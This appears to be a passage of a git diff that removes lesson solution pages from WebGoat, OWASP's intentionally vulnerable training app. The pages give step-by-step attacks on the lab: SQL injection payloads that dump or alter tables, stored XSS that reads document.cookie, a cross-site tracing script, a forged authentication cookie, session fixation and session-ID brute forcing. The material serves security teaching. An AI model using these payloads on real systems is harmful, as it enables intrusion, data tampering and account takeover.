-stage as you have only to click on the link 'Goat Hills Financial'.
-
-
-
-Figure 2: Received Mail
-
-
-
-
-
-Stage 3:
-You are on the login screen of Goat Financial Hills now. In
-the URL is the SID visible. All
-you have to do is to log in with your user name Jane
-and your password tarzan.
-
-
-
-Figure 3: Goat Hills Financial Login Screen
-
-
-
-
-Stage 4:
-The application switches again to the hacker Joe.
-There is already a prepared link you have to click on
-to reach the Goat Hill Financial. In real life this
-would be different of course. You could directly put the URL
-in the address bar of your browser.
-
-
-After having clicked on the provied link you reach
-Goat Hill Financial. Take a look at the URL and
-you will see that your SID is NOVALIDSESSION.
-Change this string to the SID you have chosen
-at the beginning of this lesson and hit enter.
-
-
-Figure 4: Browser Address Bar Before Changes
-
-
-Figure 5: Browser Address Bar After Changes
-
-
-
-Congratulation! You are logged in as Jane
-and the lesson was successful.
-
-
-Figure 6: Successful Completion Of The Lesson
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/SilentTransactions.html b/src/main/webapp/lesson_solutions_1/SilentTransactions.html
deleted file mode 100644
index da814a15d..000000000
--- a/src/main/webapp/lesson_solutions_1/SilentTransactions.html
+++ /dev/null
@@ -1,931 +0,0 @@
-
-
-
-
-
-
-
-Solution: Silent Transcations Attacks
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Perform Silent Transactions Attacks.
-
-
-
-
Concept /
-Topic To Teach:
-
-
This lesson
-teaches how to perform silent transactions attacks.
-
-
-
-
How the
-attacks works:
-
-
Any system that
-silently processes transactions using a single submission is dangerous to the
-client. For example, if a normal web application allows a simple URL
-submission, a preset session attack will allow the attacker to complete a
-transaction without the user's authorization. In Ajax, it gets worse: the
-transaction is silent; it happens with no user feedback on the page, so an
-injected attack script may be able to steal money from the client without
-authorization.
-
-
-
-
General
-Goal(s):
-
-
This is a
-sample internet banking application - money transfer page.
-
-
It shows
-below your balance, the account you are transferring to and amount you will
-transfer.
-The application uses AJAX to submit the transaction after doing some basic
-client side validations.
-Your goal is to try to bypass the user's authorization and silently execute the
-transaction.
-
-
-
-
-
-
Figure 1 AJAX Security - Silent transaction attacks
-
-
-
-
Solution:
-
-
This web
-application uses JavaScript on the client to initiate a transaction for
-transferring money. Examining the HTML source reveals that two JavaScript
-functions are being used:
-
-
-
<script>
-
-
function
-processData(){
-
-
var accountNo =
-document.getElementById('newAccount').value;
-
-
var amount =
-document.getElementById('amount').value;
-
-
if ( accountNo == ''){
-
-
alert('Please enter a valid account number to
-transfer to.')
-
-
return;
-
-
}
-
-
else if ( amount == ''){
-
-
alert('Please enter a valid amount to
-transfer.')
-
-
return;
-
-
}
-
-
var balanceValue =
-document.getElementById('balanceID').innerText;
-
-
balanceValue = balanceValue.replace( new
-RegExp('$') , '');
-
-
if ( parseFloat(amount) >
-parseFloat(balanceValue) ) {
-
-
alert('You can not transfer more funds than
-what is available in your balance.')
-
-
return;
-
-
}
-
-
document.getElementById('confirm').value = 'Transferring'
-
-
submitData(accountNo,
-amount);
-
-
document.getElementById('confirm').value = 'Confirm'
-
-
balanceValue
-= parseFloat(balanceValue) - parseFloat(amount);
-
-
balanceValue
-= balanceValue.toFixed(2);
-
-
document.getElementById('balanceID').innerText
-= balanceValue + '$';
-
-
}
-
-
function
-submitData(accountNo, balance) {
-
-
var url =
-'attack?Screen=74&menu=1150&from=ajax&newAccount='+
-accountNo+ '&amount=' + balance +'&confirm=' +
-document.getElementById('confirm').value;
-
-
if (typeof
-XMLHttpRequest != 'undefined') {
-
-
req = new
-XMLHttpRequest();
-
-
} else if
-(window.ActiveXObject) {
-
-
req = new
-ActiveXObject('Microsoft.XMLHTTP');
-
-
}
-
-
req.open('GET', url, true);
-
-
req.onreadystatechange = callback;
-
-
req.send(null);
-
-
}
-
-
function
-callback() {
-
-
if (req.readyState == 4) {
-
-
if (req.status == 200) {
-
-
var result = req.responseText ;
-
-
var resultsDiv =
-document.getElementById('resultsDiv');
-
-
resultsDiv.innerHTML = '';
-
-
resultsDiv.innerHTML
-= result;
-
-
}}}
-
-
</script>
-
-
-
The function
-processData() is called when the user fills out an account number and an amount
-to transfer. The function processData() will check if the user has sufficient
-balance before initiating the transaction. After validation of the balance, the
-JavaScript function submitData(accountNo, balance) is called which actually
-submits the required information, target account number and the amount to
-transfer, to the back-end web application.
-
-
-
-
If you are
-able to call this JavaScript function submitData(accountNo, balance) from the
-browser, you are able to bypass the client-side validation and execute this
-transaction silently, without an additional approval or digital signature of
-the user.
-
-
-
-
The latest
-generation of browsers allows to call JavaScript from the address bar, using
-javascript:function();. Try to execute: javascript:submitData(1234556,11000);
-
-
-
-
-
-
Figure 2 Follow the hints....
-
-
-
-
-
-
Figure 3 HTTP Request generated from Javascript function
-submitData(123456,110000);
-
-
-
-
-
-
-
-
Figure 4 Lesson completed
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/SoapRequest.html b/src/main/webapp/lesson_solutions_1/SoapRequest.html
deleted file mode 100644
index 72b3257e3..000000000
--- a/src/main/webapp/lesson_solutions_1/SoapRequest.html
+++ /dev/null
@@ -1,879 +0,0 @@
-
-
-
-
-
-
-
-Solution: Create a SOAP Request
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Create a SOAP Request
-
-
-
-
Concept /
-Topic To Teach:
-
-
Web
-Services communicate through the use of SOAP requests. These requests are
-submitted to a web service in an attempt to execute a function defined in the
-web service definition language (WSDL). Let's learn something about WSDL files.
-Check out WebGoat's web service description language (WSDL) file.
-
-
-
-
General
-Goal(s):
-
-
Try
-connecting to the WSDL with a browser or Web Service tool. The URL for the web
-service is: http://localhostservices/SoapRequest The WSDL can usually
-be viewed by adding a ?WSDL on the end of the web service request.
-
-
-
-
-
-
Figure 1 - Lesson 21
-
-
-
-
Solution:
-
-
-
-
Click on the
-URL "WebGoat WSDL" to examine the Webservices Description Language file.
-
-
-
-
-
-
Figure 2 - WSDL
-
-
-
-
Count the
-number of operations like getFirstName. There are 4 operations defined.
-
-
-
-
-
-
Figure 3 Enter the ID
-
-
-
-
For the next
-question the getFirstNameRequest method uses an int as parameter type. Enter
-int and click "Submit".
-
-
-
-
-
-
Figure 4 Stage 2 Completed
-
-
-
-
Intercept the
-HTTP Request with WebScarab and click on the “Raw” tab. Make sure that
-“Intercept Responses” is selected.
-
-
-
-
- Change the POST header to open
- the SoapRequest:
- POST http://localhost/WebGoat/services/SoapRequest HTTP/1.1 (This will vary based on which ports you are using)
- Change the Content-Type to
- text/xml:
- Content-Type: text/xml
- Add a header SOAPAction.
- SOAPAction: (No value needs to be specified for this header)
- Append the XML envelope to the
- request:
-
-
-
<?xml
-version="1.0" encoding="UTF-8"?>
-
-
<SOAP-ENV:Envelope
-xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
-
-
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
-
-
-
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
-
-
-
<SOAP-ENV:Body>
-
-
<ns1:getFirstName
-SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
-xmlns:ns1="http://lessons">
-
-
<id
-xsi:type="xsd:int">101</id>
-
-
- </ns1:getFirstName>
-
-
-
</SOAP-ENV:Body>
-
-
</SOAP-ENV:Envelope>
-
-
It is important that there is no whitespace (carriage returns or spaces) from the SOAPAction header to the opening XML tag. This generates an error instead of the desired response.
-
-
-
-
-
-
Figure 5 Updated HTTP request with SOAP parameters
-
-
-
-
The response
-is Joe.
-
-
-
-
Figure 6 Intercept response
-
-
-
-
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/SqlAddData.html b/src/main/webapp/lesson_solutions_1/SqlAddData.html
deleted file mode 100644
index 5e0ba4aba..000000000
--- a/src/main/webapp/lesson_solutions_1/SqlAddData.html
+++ /dev/null
@@ -1,43 +0,0 @@
-
-
-
-
-Solution: Modify Data with SQL
-
-
-
-Lesson Plan Title: Add Data with SQL
-
-Concept / Topic To Teach:
-SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
-
-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.
-
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.
-
-
-
-General Goal(s):
-The form below allows a user to view salaries associated with a userid (from the table named salaries). This form is vulnerable to String SQL Injection. In order to pass this lesson, use SQL Injection to add a record to the table.
-
-
-Solution:
-In this lesson, we will use the INSERT query, which uses the format:
-INSERT INTO table VALUES (value1, value2);
-In this case, the salaries table has two relevant columns: column 1 is userid, and column 2 is salary.
-We will use the command:
-INSERT INTO salaries VALUES ('rlupin',140000);
-This, however, will not work correctly. We are inserting this in between two single quotes in the command:
-SELECT * FROM salaries WHERE userid='userid ';
-If we treated this lesson as we have treated the previous one, our command would look like this:
-SELECT * FROM salaries WHERE userid='whatever'; INSERT INTO salaries VALUES ('rlupin',150000); '
-The statement cannot end with a single quote after the semicolon, so we must comment out the quote using -- .
-To complete this lesson, type the following into the field and press go:
-whatever'; INSERT INTO salaries VALUES ('rlupin',140000);--
-If you then search for the userid rlupin, you will see there is new record.
-
-
-New employee record after using an INSERT query.
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/SqlModifyData.html b/src/main/webapp/lesson_solutions_1/SqlModifyData.html
deleted file mode 100644
index 90594689a..000000000
--- a/src/main/webapp/lesson_solutions_1/SqlModifyData.html
+++ /dev/null
@@ -1,39 +0,0 @@
-
-
-
-
-Solution: Modify Data with SQL
-
-
-
-Lesson Plan Title: Modify Data with SQL
-
-Concept / Topic To Teach:
-SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
-
-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.
-
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.
-
-
-
-General Goal(s):
-The form below allows a user to view salaries associated with a userid (from the table named salaries). This form is vulnerable to String SQL Injection. In order to pass this lesson, use SQL Injection to modify the salary for userid jsmith.
-
-
-Solution:
-In this lesson, instead of using the SELECT query command, we use the UPDATE command, which uses the format:
-UPDATE table SET column=value WHERE column=value;
-We need to update the table salaries , setting the salary column to a new number.
-We will use the command:
-UPDATE salaries SET salary=999999 WHERE userid='jsmith'
-We also need to end the previous query and leave our last quote open to make a valid statment.
-To complete this lesson, type the following into the field and press go:
-whatever'; UPDATE salaries SET salary=999999 WHERE userid='jsmith
-If you then search for the userid jsmith, you will see the salary has been updated.
-
-
-Updated salary after using a MODIFY query.
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/SqlNumericInjection.html b/src/main/webapp/lesson_solutions_1/SqlNumericInjection.html
deleted file mode 100644
index f46d061d1..000000000
--- a/src/main/webapp/lesson_solutions_1/SqlNumericInjection.html
+++ /dev/null
@@ -1,682 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to Perform Numeric SQL Injection
-
-
-
-
Concept /
-Topic To Teach:
-
-
-
-SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
-
-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.
-
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.
-
-
General
-Goal(s):
-
-
-The form below allows a user to view weather data. Try to inject an SQL string that results in all the weather data being displayed.
-
-
-
-
-
-
Solution:
-
-
-
-
-
-
-
The
-application is taking the input from the select box and inserting it at the end of a pre-formed
-SQL command.
-
-
Compound SQL
-statements can be made by joining multiple tests with keywords like AND and OR.
-Try appending a SQL statement that always resolves to true.
-
-
-
-
This is the
-query: SELECT * FROM weather_data WHERE station = 101
-
-
-
-
Intercept the post request with WebScarab and replace 101 with 101 or 1=1!
-
-
-
-
-
-
-
Figure 1 Intercepted Request with WebScarab
-
-
-
-
As the SQL Statement is true for every station you get
-a list of all stations:
-
-
-
-
-
-
Figure 2 All stations are visible
-
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/SqlStringInjection.html b/src/main/webapp/lesson_solutions_1/SqlStringInjection.html
deleted file mode 100644
index 725648e08..000000000
--- a/src/main/webapp/lesson_solutions_1/SqlStringInjection.html
+++ /dev/null
@@ -1,716 +0,0 @@
-
-
-
-
-
-
-
-Solution: SQL String Injection
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Perform String SQL Injection
-
-
-
-
Concept /
-Topic To Teach:
-
-
-
-
SQL injection
-attacks represent a serious threat to any database-driven site. The methods
-behind an attack are easy to learn and the damage caused can range from
-considerable to complete system compromise. Despite these risks, an incredible
-number of systems on the internet are susceptible to this form of attack.
-
-Not only is it a threat easily instigated, it is also a threat that, with a
-little common-sense and forethought, can easily be prevented.
-
-It is always good practice to sanitize all input data, especially data that
-will used in OS command, scripts, and database queries, even if the threat of
-SQL injection has been prevented in some other manner.
-
-
-
-
General
-Goal(s):
-
-
The form
-below allows a user to view their credit card numbers. Try to inject an SQL
-string that results in all the credit card numbers being displayed. Try the
-user name of 'Smith'.
-
-
-
-
Solution:
-
-
-
-
Compared with
-the previous lesson, there is now a string parameter and not an integer.
-
-
Strings must be
-terminated with single quotes to have a valid SQL Query.
-
-
-
-
-
-
Figure 1 Lesson 18
-
-
-
-
The query
-used in this lesson is: SELECT * FROM user_data WHERE last_name = 'Your Name'
-
-
-
-
Enter for the
-last name value: Erwin' OR '1'='1
-
-
-
-
-
-
Figure 2 Lesson 18 Completed
-
-
-
-
-
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/StoredXss.html b/src/main/webapp/lesson_solutions_1/StoredXss.html
deleted file mode 100644
index a84fc2b40..000000000
--- a/src/main/webapp/lesson_solutions_1/StoredXss.html
+++ /dev/null
@@ -1,711 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson Plan Title: How to Perform Stored Cross Site
-Scripting (XSS)
-
-
-
-
Concept / Topic To Teach:
-
-
It is always a
-good practice to scrub all inputs, especially those inputs that will later be
-used as parameters to OS commands, scripts, and database queries. It is
-particularly important for content that will be permanently stored somewhere.
-Users should not be able to create message content that could cause another
-user to load an undesirable page or undesirable content when the user's message
-is retrieved.
-
-
-
-
General Goal(s):
-
-
The user
-should be able to add message content that cause another user to load an
-undesirable page or content.
-
-
-
-
-
-
Figure 1 Lesson 14
-
-
-
-
Solution:
-
-
-
-
Enter this: <script language="javascript"
-type="text/javascript">alert("Ha Ha Ha");</script> in the message text
-box.
-
-
-
-
Figure 2 Stored message
-
-
-
-
-
-
Figure 3 Lesson 14 nearly completed
-
-
-
-
Now enter this: <script language="javascript"
-type="text/javascript">alert(document.cookie);</script> in the message text
-box. You will get your SessionId in a popup.
-
-
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/ThreadSafetyProblem.html b/src/main/webapp/lesson_solutions_1/ThreadSafetyProblem.html
deleted file mode 100644
index 4ffede86b..000000000
--- a/src/main/webapp/lesson_solutions_1/ThreadSafetyProblem.html
+++ /dev/null
@@ -1,670 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Exploit Thread Safety Problems
-
-
-
-
Concept /
-Topic To Teach:
-
-
Web
-applications can handle many HTTP requests simultaneously. Developers often use
-variables that are not thread safe. Thread safety means that the fields
-of an object or class always maintain a valid state when used concurrently by
-multiple threads. It is often possible to exploit a concurrency bug by loading
-the same page as another user at the exact same time.
-Because all threads share the same method area, and the method area is where
-all class variables are stored, multiple threads can attempt to use the same
-class variables concurrently.
-
-
-
-
General
-Goal(s):
-
-
The user
-should be able to exploit the concurrency error in the web application and view
-login information for another user that is attempting the same function at the
-same time.
-
-
-
-
This will
-require the use of two browser windows .
-
-
-
-
-
-
Figure 1 Lesson 2
-
-
-
-
Solution:
-
-
-
-
Open a new
-browser window by pressing CTRL-N. Position the window so that you see both
-input fields. Enter user name "dave" in the left window and user name "jeff" in
-the right window.
-
-
Click very
-fast on the submit button in the right window and then in the left window.
-
-
-
-
-
-
Figure 2 2 Browser Windows
-
-
-
-
The result
-should be that you receive the same data in both windows, even when using a
-different user name!
-
-
-
-
Figure 3 Lesson 2 Completed
-
-
-
-
The root-cause
-of this exploit is that the Java code uses a static variable for the user name.
-When submitting twice, the same thread and hence the same static variable
-containing the username of the first request will be used.
-
-
This is
-obvious when examining the Java code:
-
-
-
-
private
-static String currentUser;
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/TraceXSS.html b/src/main/webapp/lesson_solutions_1/TraceXSS.html
deleted file mode 100644
index 502acdd17..000000000
--- a/src/main/webapp/lesson_solutions_1/TraceXSS.html
+++ /dev/null
@@ -1,685 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Perform Cross Site Tracing (XST) Attacks
-
-
-
-
Concept /
-Topic To Teach:
-
-
It
-is always a good practice to scrub all input, especially those inputs that will
-later be used as parameters to OS commands, scripts, and database queries. It
-is particularly important for content that will be permanently stored somewhere
-in the application. Users should not be able to create message content that
-could cause another user to load an undesireable page or undesireable content
-when the user's message is retrieved.
-
-
-
-
General
-Goal(s):
-
-
Tomcat is
-configured to support the HTTP TRACE command. Your goal is to perform a Cross
-Site Tracing (XST) attack.
-
-
-
-
Solution:
-
-
-
-
You need to
-introduce a cross site trace attack. This can be realized by embedding the
-following script in the three digit access code.
-
-
-
-
<script
-type="text/javascript">if ( navigator.appName.indexOf("Microsoft")
-!=-1) {var xmlHttp = new
-ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE",
-"./", false); xmlHttp.send();str1=xmlHttp.responseText; while
-(str1.indexOf("\n") > -1) str1 = str1.replace("\n","<br>");
-document.write(str1);}</script>
-
-
-
-
-
-
Figure 1 Lesson 15
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/UncheckedEmail.html b/src/main/webapp/lesson_solutions_1/UncheckedEmail.html
deleted file mode 100644
index 8ea6ca3e4..000000000
--- a/src/main/webapp/lesson_solutions_1/UncheckedEmail.html
+++ /dev/null
@@ -1,672 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson Plan Title: How to Exploit Unchecked Email
-
-
-
-
Concept / Topic To Teach:
-
-
It is always
-a good practice to validate all inputs. Most sites allow non-authenticated users
-to send e-mail to a 'friend'. This is a great mechanism for spammers to send
-out email using your corporate mail server.
-
-
-
-
General Goal(s):
-
-
The user
-should be able to send an obnoxious email message.
-
-
-
-
Solution:
-
-
Type a
-malicious script like <script>alert("XSS")</script> and click Send!
-
-
-
-
-
-
Figure 1 Lesson 5
-
-
-
-
-
-
-
-
-
-
Figure 2 Part 1 completed
-
-
-
-
The second
-part of this lesson is to send a mail to a friend from OWASP. This can be
-accomplished by intercepting the request with WebScarab and changing the hidden
-field "to" from webgoat.admin@owasp.org
-to bill.gates@microsoft.com
-
-
-
-
-
-
Figure 3 Change the variable to another e-mail
-address
-
-
-
-
-
-
Figure 4 Lesson 5 Completed
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/WSDLScanning.html b/src/main/webapp/lesson_solutions_1/WSDLScanning.html
deleted file mode 100644
index b39269ea1..000000000
--- a/src/main/webapp/lesson_solutions_1/WSDLScanning.html
+++ /dev/null
@@ -1,724 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Perform WSDL Scanning
-
-
-
-
Concept /
-Topic To Teach:
-
-
Web
-Services communicate through the use of SOAP requests. These requests are
-submitted to a web service in an attempt to execute a function defined in the
-web service definition language (WSDL) file.
-
-
-
-
General
-Goal(s):
-
-
This screen
-is the API for a web service. Check the WSDL file for this web service and try
-to get some customer credit numbers.
-
-
-
-
-
-
Figure 1 Lesson 22
-
-
-
-
Solution:
-
-
-
-
Open the WSDL
-file in a new window. There is an operation getCreditCard.
-
-
-
-
-
-
-
-
Intercept the
-request with WebScarab and change the parameter to getCreditCard
-
-
-
-
-
-
Figure 2 WebScarab raw request
-
-
-
-
-
-
Figure 3 Lesson 22 Completed
-
-
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/WeakAuthenticationCookie.html b/src/main/webapp/lesson_solutions_1/WeakAuthenticationCookie.html
deleted file mode 100644
index 926440486..000000000
--- a/src/main/webapp/lesson_solutions_1/WeakAuthenticationCookie.html
+++ /dev/null
@@ -1,915 +0,0 @@
-
-
-
-
-
-
-
-Solution: Spoof an Authentication Cookie
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Spoof an Authentication Cookie
-
-
-
-
Concept / Topic To Teach:
-
-
-
-
Many
-applications will automatically log a user into their site if the right
-authentication cookie is specified. Some times the cookie values can be
-guessed if the algorithm for generating the cookie can be obtained. Some
-times the cookies are left on the client machine and can be stolen by
-exploiting another system vulnerability. Some times the cookies maybe
-intercepted using Cross site scripting. This lesson tries to make the
-student aware of authentication cookies and presents the student with a way to
-defeat the cookie authentication method in this lesson.
-
-
-
-
-
-
General Goal(s):
-
-
The user
-should be able to bypass the authentication check.
-
-
-
-
Solution:
-
-
-
-
Make sure
-that you have "Show Cookies" enabled in WebGoat. And you need to disable the
-feature "Inject know cookies into requests" in WebScarab otherwise WebScarab
-will always inject your old cookie and not the new cookie.
-
-
-
-
-
-
Figure 1 Disable "Inject known cookies into
-requests"
-
-
-
-
-
-
Figure 2 Logon with webgoat/webgoat
-
-
-
-
You can login
-with webgoat/webgoat.
-
-
-
-
-
-
Figure 3 Logged on as webgoat
-
-
-
-
Hit
-"Refresh". This refresh will show our AuthCookie. And you are now authenticated
-using this cookie and not with parameters like above.
-
-
-
-
-
-
-
-
There is a
-new cookie called AuthCookie with values 65432ubphcfx. Logout and login with
-aspect/aspect.
-
-
-
-
-
-
Figure 4 Logon as aspect/aspect
-
-
-
-
-
-
Figure 5 Logged on as aspect
-
-
-
-
Hit "Refresh"
-to see the new cookie.
-
-
-
-
-
-
Figure 6 Cookie for user aspect
-
-
-
-
You have now
-a different cookie value for AuthCookie: 65432udfgfb
-
-
-
-
-
-
- webgoat
-
-
- ubphcfx
-
-
-
-
- Aspect
-
-
- udfgfb
-
-
-
-
-
-
-
This is an transposition
-of the letters of the alphabet. Each letter is replaced with its successor, for
-example t->u, a->b and the user name is reversed. So for user name alice the cookie will
-contain the reversed user name ecila and the successors of the letters. This
-results in fdjmb.
-
-
-
-
Login with
-user name alice
-and intercept the request in WebScarab. Add AuthCookie=65432fdjmb to the
-existing cookie JSESSIONID.
-
-
-
-
-
-
-
-
-
-
Figure 7 Add AuthCookie to request
-
-
-
-
-
-
Figure 8 Lesson 11 Completed
-
-
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID.html b/src/main/webapp/lesson_solutions_1/WeakSessionID.html
deleted file mode 100644
index 2bfff1bc5..000000000
--- a/src/main/webapp/lesson_solutions_1/WeakSessionID.html
+++ /dev/null
@@ -1,90 +0,0 @@
-
-
-
-
-Solution: How to Hijack a Session
-
-
-
-Lesson Plan Title: How to Hijack a Session
-
-Concept / Topic To Teach:
-Application developers who develop their own session IDs frequently forget to incorporate the complexity and randomness necessary for security. If the user specific session ID is not complex and random, then the application is highly susceptible to session-based brute force attacks.
-
-
-General Goal(s):
-Try to access an authenticated session belonging to someone else.
-In this lesson we are trying to predict the WEAKID value. THe WEAKID is used to differentiate authenticated and anonymous users of WebGoat.
-
-
-Solution:
-The easiest way to complete this lesson is to use WebScarab's Session ID Analysis feature. The Solution Videos provide another method of uncovering it as well.
-To access the Session ID Analysis, you need to put WebScarab in its full-featured mode, if it isn't already. This can be enabled by going to Tools -> use full-featured interface in WebScarab.
-Click on the SessionID Analysis tab at the top of the page, then use the Previous Requests dropdown to select the most recent GET request with a 200 OK header. Its address will end with webgoat/attack, not an image or java file.
-
-
-Selecting the correct GET request for Session ID analysis.
-
-Next, we need to make sure that WebScarab is able to fetch the WEAKID cookie. Click the Test button at the bottom of the page. You should get a popup window showing the WEAKID.
-
-
-Succesful WEAKID test popup.
-
-If the popup indicates that no valid session is found, that means there is already a WEAKID value in the request. This prevents the "Set-Cookie" header from being sent in the response. To fix this, delete the WEAKID=value; portion of the Cookie header and press test again.
-
-Now we need to fetch a set of WEAKIDs. Enter "50" into the Samples field at the bottom of the window, then press Fetch . Switch to the "Analysis" tab. Select the WEAKID option from the Session Identifier dropdown, and the window should populate with WEAKID values.
-
-The WEAKID is divided into two parts: the first part before the dash is an identifier that increases by 1 in each cookie, and the part after the dash is a time value that is calculated when the request is submitted.
-Notice that there is sometimes a gap in the first value of the WEAKID, where one number is skipped. The missing value is what we need to log in, we just need to figure out the time stamp value that goes after the dash.
-It's simple to spot where this value is. Look at the "Difference" column on the analysis screen. Almost all of the values will be only one or two apart. We are looking for the record where this value is around double the rest of them.
-
-
-Analysis screen with the cookie of interest highlighted.
-
-This WEAKID follows the one we're trying to find. You will notice the identifier of the cookie preceding the highlighted one is two less, whereas all the other cookies decrease only by one. The one missing is what we want to find:
-16964 -1312472439375
-16966 -1312472439484
-The WEAKID beginning with 16965 is missing. This is the WEAKID we want, we just need to figure out the second part.
-
-We'll figure this out by using the brute force method. We will send requests with each possible timestamp value until we find one that is successful. Its timestamp must be between the two surrounding it:
-16964-1312472439375
-16965-?????????????
-16966-1312472439484
-
-So our timestamp is between 1312472439375 and 1312472439484 . Now we just need a program to do brute force this for us. We will use J-Baah , previously known as Crowbar. Download it and run the .jar.
-We will configure J-Baah to send our request repeatedly, with a different WEAKID each time. Copy our RAW HTTP Request we used to generate these cookies, found under the Collection tab. Paste it in the Request box in J-Baah.
-
-The WEAKID paramter needs to be put into the request. It will begin with the missing value we figured out before the dash, 16965 in our case. How do we fill in the rest when we dont know what it is?
-In this case, we will add WEAKID=16965-1312472439##1## ; to the Cookie paramter of our request. The ##1## replaces the part of the timestamp that varies in our range. Next, we specify this range. In the Paramter 1 Tab, we set From as 375, and To as 484.
-
-
-J-Baah setup.
-Lastly, go to the "Target" tab at the bottom right, and set the Host to localhost and the Port to whichever port WebGoat is using, generally 80 or 8080.
-Go back to the "Action" tab, and click Base Response . You should see a message on the bottom left that a response is generated successfully. Change Threads to 2 and then press Start . The bottom left window should start filling up with "Hijack a session"
-
-
-All of the responses for each WEAKID. The successful attempt is highlighted.
-
-
-Before we go any further, it is important to understand what is happening here. The ##1## string is replaced with a different number in the range we specified and the request is sent. The first WEAKID tried is 16965-1312472439375 , then it tries every timestamp until the last one, 16965-1312472439484 . J-Baah collects all of these responses and shows them in the bottom left window.
-
-Each line shows one response, and displays important information about it.
-0.99969 : 417 : : Hijack a Session
-Clicking base response tries the first WEAKID and sets its response as the control. This first number indicates how similar this response is to the base response. A value of 1 means the responses are identical. The further the number is from 1, the more different this response is.
-
-0.99969 : 417 : : Hijack a Session
-This second number is the value replacing the ##1## in our request.
-0.99969 : 417 : : Hijack a Session
-The last portion is the title of the response page. In this case, if it's not "Hijack a Session", something went wrong.
-
-The value indicating similarity to the base response will tell us which WEAKID worked. If everything went swimmingly, there should only be three values for this number. Look again at the screenshot above. There are many responses showing .99969, one showing .9949, then many more showing .99954. The response stayed the same until we got to the WEAKID ending in 429, then it changed. This is where the brute force succeeded. Right click on this response and click "Show Response".
-
-
-This WEAKID worked! We hijacked this session.
-
-Refreshing the lesson should show it is complete.
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID.htmlBAK b/src/main/webapp/lesson_solutions_1/WeakSessionID.htmlBAK
deleted file mode 100644
index d2605b85c..000000000
--- a/src/main/webapp/lesson_solutions_1/WeakSessionID.htmlBAK
+++ /dev/null
@@ -1,889 +0,0 @@
-
-
-
-
-
-
-
-Solution: How to Hijack a Session
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Hijack a Session
-
-
-
-
Concept /
-Topic To Teach:
-
-
-
-
Application
-developers who develop their own session IDs frequently forget to incorporate
-the complexity and randomness necessary for security. If the user specific
-session ID is not complex and random, then the application is highly
-susceptible to session-based brute force attacks.
-
-
-
-
General
-Goal(s):
-
-
Try to access
-an authenticated session belonging to someone else.
-
-
-
-
-
-
In this
-lesson the purpose is to predict the WEAKID value. The WEAKID is used to
-differentiate authenticated and anonymous users of WebGoat.
